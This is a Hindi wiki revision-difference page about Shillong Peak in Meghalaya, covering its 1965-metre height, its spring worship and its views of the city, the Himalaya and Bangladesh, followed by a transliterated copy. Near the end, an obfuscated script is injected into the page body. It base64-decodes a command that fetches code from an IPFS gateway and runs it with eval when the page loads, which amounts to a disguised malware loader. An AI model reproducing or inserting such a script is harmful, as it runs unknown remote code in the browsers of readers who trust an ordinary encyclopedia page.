Difference between revisions of "शिलांग चोटी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " जमीन" to " ज़मीन")
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(3 intermediate revisions by one other user not shown)
Line 3: Line 3:
 
*शिलांग चोटी की ऊँचाई समुद्र तल से 1965 मीटर है।  
 
*शिलांग चोटी की ऊँचाई समुद्र तल से 1965 मीटर है।  
 
*शिलांग चोटी एक पर्यटन स्थल भी है और हर साल बसंत के समय यहाँ के निवासी शिलांग के [[देवता]] की पूजा करते हैं।
 
*शिलांग चोटी एक पर्यटन स्थल भी है और हर साल बसंत के समय यहाँ के निवासी शिलांग के [[देवता]] की पूजा करते हैं।
*शिलांग चोटी से पूरे शहर का विहंगम नजारा देखा जा सकता है।  
+
*शिलांग चोटी से पूरे शहर का विहंगम नज़ारा देखा जा सकता है।  
 
*रात के समय यहाँ से पूरे शहर की रोशनी असंख्य [[तारा|तारों]] जैसी चमकती है मानो ज़मीन पर ही 'तारा मंडल' आ गया हो।
 
*रात के समय यहाँ से पूरे शहर की रोशनी असंख्य [[तारा|तारों]] जैसी चमकती है मानो ज़मीन पर ही 'तारा मंडल' आ गया हो।
*साफ मौसम में इस चोटी से [[हिमालय]] की श्रृंखलाएँ और [[बांग्लादेश]] के मैदानी इलाके भी साफ दिखाई देते हैं।
+
*साफ मौसम में इस चोटी से [[हिमालय]] की श्रृंखलाएँ और [[बांग्लादेश]] के मैदानी इलाके भी साफ़ दिखाई देते हैं।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 11:33, 9 February 2021

thumb|250px|shilaang choti shilaang choti meghalay rajy ke shilaang shahar se 10 kimi door sthit sabase ooanchi choti hai.

  • shilaang choti ki ooanchaee samudr tal se 1965 mitar hai.
  • shilaang choti ek paryatan sthal bhi hai aur har sal basant ke samay yahaan ke nivasi shilaang ke devata ki pooja karate haian.
  • shilaang choti se poore shahar ka vihangam nazara dekha ja sakata hai.
  • rat ke samay yahaan se poore shahar ki roshani asankhy taroan jaisi chamakati hai mano zamin par hi 'tara mandal' a gaya ho.
  • saph mausam mean is choti se himalay ki shrriankhalaean aur baangladesh ke maidani ilake bhi saf dikhaee dete haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh